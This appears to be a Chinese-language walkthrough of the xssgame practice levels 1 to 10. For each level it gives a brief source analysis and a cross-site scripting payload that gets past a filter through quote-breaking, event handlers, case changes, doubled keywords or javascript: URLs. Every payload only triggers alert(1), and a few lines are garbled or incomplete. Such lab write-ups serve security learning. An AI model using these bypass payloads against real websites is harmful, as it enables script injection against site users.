XSS知识朝花夕拾
xssgame(1-10)
简单源码分析
Level1
看看源码,直接将用户输入的内容不加处理的添加到了echo语句中进行“打印”,
Payload:
<script>alert(1)
<img src=”” οnerrοr=alert(“1”)>
还有很多很多
Level2
查看源码Payload位置 echo中的<input name=keyword value=”’.str.’”>
使用“>将标签闭合之后出发xssLevel3
查看源码,使用了htmlspecialchars()函数对传入的参数进行了处理,但是可以使用单引号,进行绕过,添加一个点击事件Payload:
’ οnclick=alert(1)//
’ οnclick=’ window.alert(‘1’)
Level4
查看源码,使用str_replace()函数,将<>替换为空
![h使用双引号闭合value的值,之后添加onclick事件
Level5
查看源码使用了str_replace()函数对输入进行处理
使用”>闭合value,再添加<a href=>标签。
Level6
查看源代码
过滤了href、data、<script、on、src
尝试了一下之后发现可以使用大小写绕过Payload:
“><a HREF=”javascript:alert(1)”>
Level7
查看源码,将敏感字符替换为空,可以使用双写绕过
Payload:
“><a hrhrefef=”javascscriptript:alert(1)”>Level8
查看源码
尝试之后,发现可以使用编码绕过Payload: javascript:alert(1)
Level9
查看源码跟第八题不一样的地方是有对http://做校验
在上一个payload的基础上,加上就行了Level10
查看源码使用了type=”hidden”,隐藏了输入
使用双引号闭合value的双引号,之后添加type=”text”,之后设置一个点击事件
Payload:” type=”text” οnclick=”alert(1)